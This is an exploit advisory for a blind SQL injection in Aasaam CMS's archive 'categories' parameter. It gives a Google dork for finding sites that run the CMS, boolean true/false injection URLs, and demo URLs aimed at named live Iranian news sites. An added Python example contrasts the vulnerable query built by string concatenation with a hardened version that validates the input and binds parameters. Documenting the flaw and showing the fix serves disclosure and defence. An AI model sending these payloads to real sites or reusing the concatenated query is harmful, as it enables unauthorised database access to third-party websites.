[-] Exploit Title: Aasaam Cms Blind SQL Injection Vulnerability
[-] Vendor Homepage : https://aasaam.com
[-] Google Dork: intext:"سامانه خبری آسام"
[-] Author : Milad Ahmadi
[-] Date : 30.October.2017
[-] Version: All
[-] Tested on Windows 10
---------------------------------------------------------------------
[ Description ]
Aasaam CMS (content management system) is one of the most popular CMSs for building news sites. Many Iranian news sites run on it, such as Donya-E-Eqtesad, Ilna News, Jamaran News, Borna News and others.
The archive page of this CMS is vulnerable to blind SQL injection through the category parameter ("categories" in the request URL).
---------------------------------------------------------------------
[ Poc ]
http://site.com/newsstudios/archive/?categories=-[ID] AND 8*8=1
http://site.com/newsstudios/archive/?categories=-[ID] AND 8*8=64
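
Why the two requests above return different pages, and how the parameter should be handled instead. This is an added example, not code from Aasaam CMS or from the author: the table, its columns, the IN (...) query shape and both function names are assumptions, and the data is constructed, in an in-memory SQLite database.

```python
import re
import sqlite3

# Accept only a comma-separated list of (optionally negative) integers.
ID_LIST = re.compile(r"-?[0-9]+(,-?[0-9]+)*")


def make_db():
    """Constructed sample data; schema and names are assumptions."""
    db = sqlite3.connect(":memory:")
    db.execute(
        "CREATE TABLE news (id INTEGER PRIMARY KEY, category_id INTEGER, title TEXT)"
    )
    db.executemany(
        "INSERT INTO news (category_id, title) VALUES (?, ?)",
        [(1, "Economy report"), (1, "Market update"), (2, "Sports recap")],
    )
    return db


def archive_vulnerable(db, categories):
    """Assumed vulnerable pattern: the raw parameter becomes part of the SQL text."""
    sql = "SELECT title FROM news WHERE category_id IN (" + categories + ") ORDER BY id"
    # The database evaluates whatever expression arrives, so a true and a
    # false condition in the parameter produce different result sets.
    return [row[0] for row in db.execute(sql)]


def archive_hardened(db, categories):
    """Validate the parameter, then bind the ids as values, never as SQL."""
    if not ID_LIST.fullmatch(categories):
        raise ValueError("categories must be a comma-separated list of integers")
    ids = [int(part) for part in categories.split(",")]
    marks = ",".join("?" for _ in ids)
    sql = f"SELECT title FROM news WHERE category_id IN ({marks}) ORDER BY id"
    return [row[0] for row in db.execute(sql, ids)]


if __name__ == "__main__":
    db = make_db()
    for value in ("-1 AND 8*8=64", "-1 AND 8*8=1"):
        print("vulnerable:", repr(value), "->", archive_vulnerable(db, value))
        try:
            archive_hardened(db, value)
        except ValueError as err:
            print("hardened:  ", repr(value), "-> rejected:", err)
    print("hardened:   '1' ->", archive_hardened(db, "1"))
```

A differing response between the true and the false condition is the signal a blind injection relies on. The hardened function rejects both requests before any SQL is built.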
---------------------------------------------------------------------
[ Demo ]
http://www.jamaran.ir/newsstudios/archive/?categories=-1%20AND%208*8=64
http://www.jamaran.ir/newsstudios/archive/?categories=-1%20AND%208*8=1
http://www.ilna.ir//newsstudios/archive/?categories=-1%20AND%208*8=1
http://www.ilna.ir//newsstudios/archive/?categories=-1%20AND%208*8=64
http://www.bornanews.ir/newsstudios/archive/?categories=-1%20AND%208*8=1
http://www.bornanews.ir/newsstudios/archive/?categories=-1%20AND%208*8=64
---------------------------------------------------------------------
Thanks To: All GuardIran Security Team Members
Discovered By: Milad Ahmadi